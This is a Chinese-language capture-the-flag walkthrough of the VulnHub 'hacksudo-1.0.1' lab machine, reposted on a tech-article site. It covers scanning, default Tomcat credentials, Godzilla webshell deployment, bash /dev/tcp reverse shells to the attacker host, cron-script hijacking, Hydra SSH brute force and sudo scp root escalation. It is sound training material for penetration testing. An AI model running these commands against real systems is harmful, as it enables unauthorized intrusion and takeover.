IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> 渗透测试hacksudo-1.0.1 SCP提权 -> 正文阅读

[PHP知识库]渗透测试hacksudo-1.0.1 SCP提权

在这里插入图片描述

靶机信息

下载地址:

https://www.vulnhub.com/entry/hacksudo-101,650/

名称: hacksudo系列1.0.1

靶场: VulnHub.com

难度: 简单

发布时间: 2021年4月4日

提示信息: 无

目标: user.txt和root.txt

实验环境

攻击机:VMware  kali    192.168.7.3
靶机:Vbox     linux   IP自动获取

信息收集

扫描主机

扫描局域网内的靶机IP地址

sudo nmap -sP 192.168.7.1/24

image-20220126222435102

扫描到靶机地址为192.168.7.124

端口扫描

端口扫描是扫描目标机器所开放的服务

sudo nmap -sC -sV  -p- 192.168.7.124 -oN hacksudo.nmap

image-20220126222750374

扫描到3个开放端口2222(SSH),80和8080都是HTTP服务,先看80端口

Web渗透

http://192.168.7.124

image-20220126223112391

打开后看到一个登录页面,右边可以注册,源码里有些东西

image-20220126223508568

image-20220126223523817

可以看到下面的代码是文件包含,试一试

http://192.168.7.124/index.php?file=../../../../../../../../../../../../../../../../etc/passwd

没有返回,先做个目录扫描,等待时注册个帐号看看

image-20220126224225422

填好信息邮箱aaa@qq.com密码123456

image-20220126224316491

提交后报错

image-20220126224447540

点击确定后看到输出的错误像是数据库连接失败

首页上方还有一段php代码,里面有个页面fandom.php我们访问看看

image-20220126224823364

http://192.168.7.124/fandom.php

image-20220126224947661

打开后有3个链接,点进去看看

image-20220126225219540

进入后发现页面很奇,感觉像是php没解析,目录扫描也没有找敏感信息

dirsearch -u http://192.168.7.124 -e php,html,txt,zip -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

image-20220126225528768

访问8080端口

http://192.168.7.124:8080

image-20220127011338291

打开后是Tomcat的默认页面,点击右边的Manager App可以进入管理页面,在弹出的登录框中随手填入帐号admin密码admin竟然登录成功了,有点不敢相信,过了一会我想截图,然后清空浏览器后再登录就失败了,随后试了几个帐号,最后用帐号tomcat和密码tomcat登录了

image-20220127011558679

登录到后台我们就可以上传一个webshell,这里我还是用上次使用哥斯拉生成的godzilla.jsp详细操作步骤请看我的第8篇文章(靶机练习No.8 VulnHub靶场Thales)靶机练习No.8 VulnHub靶场Thales (qq.com),请不多说,我们上传webshell

Webshell

image-20220127012704189

点击浏览选择你的webshell,然后点击部署

image-20220127012744828

点击后可以看到godzilla这个目录,现在用哥斯拉连接

image-20220127013344335

url中填入

http://192.168.7.124:8080/godzilla/godzilla.jsp

有效载荷要选JavaDynamicPayload,设置好的点击测试连接

image-20220127013532658

提示Success!就可以点添加了

image-20220127013646989

进入后点击命令执行我们反弹个shell(因为个人不喜欢这个界面,看着不舒服)

反弹shell

攻击机监听4444端口

nc -lvvp 4444

image-20220127013851517

哥斯拉中输入

/bin/bash -c 'bash -i >& /dev/tcp/192.168.7.3/4444 0>&1'

image-20220127014215578

image-20220127014232601

反弹成功,切换成完整的交互shell

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl+z快捷键

image-20220127014431529

stty -a
stty raw -echo;fg
reset

image-20220127014527406

stty rows 44 columns 82

image-20220127014608253

切换完成,现在查找下敏感文件

/varwww目录下找到一个backup文件,提示恢复访问权限从***不明白什么意思

image-20220127014838335

/var/backups目录下有发现

cd /var/backups
ls -al
cd hacksudo

image-20220127015048346

找到hacksudo目录,里面有三个文件,查看下内容

cat log.txt

image-20220127015910364

得到字符串ilovestegno可能是密码

看一下有几个帐号可以登录

cat /etc/passwd

image-20220127020204870

三个用户有登录权限root、hacksudo和vishal试试用刚才的密码能不能登录这三个帐号(都不登录),再找找

cd /home
ls
cat flag2.txt

image-20220127021108818

cd office
ls

image-20220127021134821

查看后没有可利用的文件,上传个pspy检查一下

kali攻击机开启http服务

python3 -m http.server

靶机上下载

cd /tmp
wget http://192.168.7.3:8000/pspy64
chmod +x pspy64
./pspy64

image-20220127022121783

有发现,我们去看下是什么文件

cd /home/vishal/office
ls -al

image-20220127022623695

可以看到manage.sh文件我们有读和执行的权限,看看是什么内容

cat manage.sh

image-20220127022955909

没有可利用的地方,到这里已经走不下去了,暴破帐号密码试试吧

ssh密码暴破

我们知道了三个可以登录ssh的帐号,把他们放到字典里

vi user.txt

image-20220127031819413

开始暴破密码

hydra -L user.txt -P ../../../Dict/常用密码.txt  192.168.7.124 -s 2222 ssh

image-20220127040459621

暴破成功用户名vishal密码hacker,登录ssh

ssh vishal@192.168.7.124 -p 2222
输入密码hacker

image-20220127033656208

登录成功,看一下manage.sh添加反弹sehll进去

cd office
ls -al
echo 'bash -i >& /dev/tcp/192.168.7.3/4444 0>&1' >manage.sh

kali攻击机重新开启监听4444端口,然后等待后台自动运行反弹shell

nc -lvvp 4444

image-20220127034240923

反弹成功有lxd可以提权,先看看目录下有什么文件

ls
cat user.txt

image-20220127034409830

拿到user.txt这个shell有点难用,切换交互shell

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm

image-20220127034527285

SCP免密提权

看下有什么可利用的

sudo -l

image-20220127034720610

执行/usr/bin/scp不需要root密码,找一下scp如何提权

image-20220127034900760

image-20220127034914637

TF=$(mktemp)
echo 'sh 0<&2 1>&2' > $TF
chmod +x "$TF"
sudo scp -S $TF x y:
id

image-20220127035147378

cd /root
ls
cat root.txt

image-20220127035358016

拿到root权限,游戏结束
在这里插入图片描述

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2022-01-28 11:40:17  更:2022-01-28 11:40:36 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 -2024/12/27 4:37:40-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码
数据统计